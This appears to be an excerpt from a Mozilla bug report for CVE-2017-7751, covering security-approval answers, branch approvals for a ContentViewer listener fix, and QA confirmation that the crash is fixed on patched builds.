Commit message could be
-m "Bug 1363396, ensure ContentViewer listeners are handled only when needed, r=mccr8"


Which older supported branches are affected by this flaw?
This code is 17 years old

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
The patch should apply cleanly at least to beta


How likely is this patch to cause regressions; how much testing does it need?
Should be safe, just clearing a pointer value.
But someone should try to reproduce with and without the patch. So QA would be good here.
The patch is based on code inspection.
Attachment #8865979 - Flags: sec-approval?
Attachment #8865979 - Flags: approval-mozilla-esr52?
Attachment #8865979 - Flags: approval-mozilla-beta?
Comment on attachment 8865979 [details] [diff] [review]
contentviewer_listeners.diff

Giving sec-approval and branch approvals.
Attachment #8865979 - Flags: sec-approval?
Attachment #8865979 - Flags: sec-approval+
Attachment #8865979 - Flags: approval-mozilla-esr52?
Attachment #8865979 - Flags: approval-mozilla-esr52+
Attachment #8865979 - Flags: approval-mozilla-beta?
Attachment #8865979 - Flags: approval-mozilla-beta+
Group: layout-core-security → core-security-release
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
Whiteboard: [post-critsmash-triage] → [post-critsmash-triage][adv-main54+][adv-esr52.2+]
Alias: CVE-2017-7751
Reproduced the crash on Ubuntu 16.04 x64 using an affected build (55.0a1 linux64-asan from 2017-05-09, 20170509120348) and the test case provided by Nils in Comment 0.


This bug is verified fixed on Ubuntu 16.04 x64 using the following builds:

  * 55.0a1 linux64-asan from 2017-06-09 (20170609011144)
  * 54.0b linux64-asan from 2017-06-08 (20170608174002)
  * 52.2.0esr linux64-asan from 2017-06-08 (20170608175922)

The test case is no longer crashing.
Status: RESOLVED → VERIFIED
Flags: qe-verify+
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Group: core-security-release